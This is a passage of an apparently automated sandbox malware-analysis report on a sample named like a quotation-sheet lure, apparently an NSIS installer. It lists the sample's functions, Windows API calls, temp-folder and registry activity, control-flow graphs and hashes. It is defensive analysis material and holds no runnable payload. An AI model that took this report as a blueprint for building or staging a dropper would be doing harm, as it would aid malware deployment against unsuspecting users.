                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte$C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp$C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll$Call
                                                                                • API String ID: 1941528284-4035100231
                                                                                • Opcode ID: e86eb43d57ba0c2d99ca0b7ff3522d788eea5d214447215224ccb5ba789c1ef7
                                                                                • Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
                                                                                • Opcode Fuzzy Hash: e86eb43d57ba0c2d99ca0b7ff3522d788eea5d214447215224ccb5ba789c1ef7
                                                                                • Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD
                                                                                Function 0040507C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 625 40507c-405091 626 405147-40514b 625->626 627 405097-4050a9 625->627 628 4050b4-4050c0 lstrlenA 627->628 629 4050ab-4050af call 405e85 627->629 630 4050c2-4050d2 lstrlenA 628->630 631 4050dd-4050e1 628->631 629->628 630->626 633 4050d4-4050d8 lstrcatA 630->633 634 4050f0-4050f4 631->634 635 4050e3-4050ea SetWindowTextA 631->635 633->631 636 4050f6-405138 SendMessageA * 3 634->636 637 40513a-40513c 634->637 635->634 636->637 637->626 638 40513e-405141 637->638 638->626
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                • lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll
                                                                                • API String ID: 2531174081-1725250884
                                                                                • Opcode ID: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                                                                • Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
                                                                                • Opcode Fuzzy Hash: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                                                                • Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8
                                                                                Function 00405542 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 639 405542-40558d CreateDirectoryA 640 405593-4055a0 GetLastError 639->640 641 40558f-405591 639->641 642 4055ba-4055bc 640->642 643 4055a2-4055b6 SetFileSecurityA 640->643 641->642 643->641 644 4055b8 GetLastError 643->644 644->642
                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                                                • GetLastError.KERNEL32 ref: 00405599
                                                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
                                                                                • GetLastError.KERNEL32 ref: 004055B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                • API String ID: 3449924974-2230009264
                                                                                • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                • Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
                                                                                • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                • Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA
                                                                                Function 0040618E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 645 40618e-4061ae GetSystemDirectoryA 646 4061b0 645->646 647 4061b2-4061b4 645->647 646->647 648 4061c4-4061c6 647->648 649 4061b6-4061be 647->649 651 4061c7-4061f9 wsprintfA LoadLibraryExA 648->651 649->648 650 4061c0-4061c2 649->650 650->651
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                                                • wsprintfA.USER32 ref: 004061DE
                                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%s.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-4240819195
                                                                                • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                • Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
                                                                                • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                • Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69
                                                                                Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 652 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 659 4023b0-4023b8 652->659 660 4028cf-4028de 652->660 662 4023c8-4023cb 659->662 663 4023ba-4023c7 call 402a3a lstrlenA 659->663 664 4023db-4023de 662->664 665 4023cd-4023da call 402a1d 662->665 663->662 669 4023e0-4023ea call 402f5c 664->669 670 4023ef-402403 RegSetValueExA 664->670 665->664 669->670 674 402405 670->674 675 402408-4024de RegCloseKey 670->675 674->675 675->660 677 4026a6-4026ad 675->677 677->660
                                                                                APIs
                                                                                • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateValuelstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 1356686001-2551829887
                                                                                • Opcode ID: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                                                • Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
                                                                                • Opcode Fuzzy Hash: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                                                • Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28
                                                                                Function 00405B05 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 678 405b05-405b0f 679 405b10-405b3b GetTickCount GetTempFileNameA 678->679 680 405b4a-405b4c 679->680 681 405b3d-405b3f 679->681 682 405b44-405b47 680->682 681->679 683 405b41 681->683 683->682
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405B19
                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405B33
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
                                                                                • nsa, xrefs: 00405B10
                                                                                • "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe", xrefs: 00405B05
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-3617279630
                                                                                • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
                                                                                • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59
                                                                                Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 684 100016bd-100016f9 call 10001a5d 688 1000180a-1000180c 684->688 689 100016ff-10001703 684->689 690 10001705-1000170b call 100021b0 689->690 691 1000170c-10001719 call 100021fa 689->691 690->691 696 10001749-10001750 691->696 697 1000171b-10001720 691->697 698 10001770-10001774 696->698 699 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 696->699 700 10001722-10001723 697->700 701 1000173b-1000173e 697->701 705 100017b2-100017b8 call 100023da 698->705 706 10001776-100017b0 call 10001559 call 100023da 698->706 722 100017b9-100017bd 699->722 703 10001725-10001726 700->703 704 1000172b-1000172c call 100027e8 700->704 701->696 707 10001740-10001741 call 10002aa3 701->707 711 10001733-10001739 call 10002589 703->711 712 10001728-10001729 703->712 718 10001731 704->718 705->722 706->722 715 10001746 707->715 721 10001748 711->721 712->696 712->704 715->721 718->715 721->696 727 100017fa-10001801 722->727 728 100017bf-100017cd call 100023a0 722->728 727->688 730 10001803-10001804 GlobalFree 727->730 734 100017e5-100017ec 728->734 735 100017cf-100017d2 728->735 730->688 734->727 737 100017ee-100017f9 call 100014e2 734->737 735->734 736 100017d4-100017dc 735->736 736->734 738 100017de-100017df FreeLibrary 736->738 737->727 738->734
                                                                                APIs
                                                                                  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                  • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                  • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                  • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1791698881-3916222277
                                                                                • Opcode ID: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                                • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                • Opcode Fuzzy Hash: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                                • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 741 401f90-401f9c 742 401fa2-401fb8 call 402a3a * 2 741->742 743 402057-402059 741->743 752 401fc7-401fd5 LoadLibraryExA 742->752 753 401fba-401fc5 GetModuleHandleA 742->753 744 4021c4-4021c9 call 401423 743->744 750 4028cf-4028de 744->750 755 401fd7-401fe4 GetProcAddress 752->755 756 402050-402052 752->756 753->752 753->755 758 402023-402028 call 40507c 755->758 759 401fe6-401fec 755->759 756->744 764 40202d-402030 758->764 760 402005-40201c call 100016bd 759->760 761 401fee-401ffa call 401423 759->761 767 40201e-402021 760->767 761->764 772 401ffc-402003 761->772 764->750 765 402036-40203e call 403783 764->765 765->750 771 402044-40204b FreeLibrary 765->771 767->764 771->750 772->764
                                                                                APIs
                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2987980305-0
                                                                                • Opcode ID: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                                                • Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
                                                                                • Opcode Fuzzy Hash: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                                                • Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E
                                                                                Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,?,004059DA,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 0040597C
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                  • Part of subcall function 00405542: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,00000000,00000000,000000F0), ref: 00401634
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte, xrefs: 00401629
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte
                                                                                • API String ID: 1892508949-3731622782
                                                                                • Opcode ID: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                                                • Instruction ID: f000a06b92b438bb55e13d50866b264c9e4ef6e61e5cb38cc97b05dde0840845
                                                                                • Opcode Fuzzy Hash: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                                                • Instruction Fuzzy Hash: 3F110436504151BFEF217B654C405BF27B0EA92324738467FE592B22E6C63C0A42AA3E
                                                                                Function 004055F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                                                • CloseHandle.KERNEL32(?), ref: 0040562A
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405607
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
                                                                                • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79
                                                                                Function 004068E3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
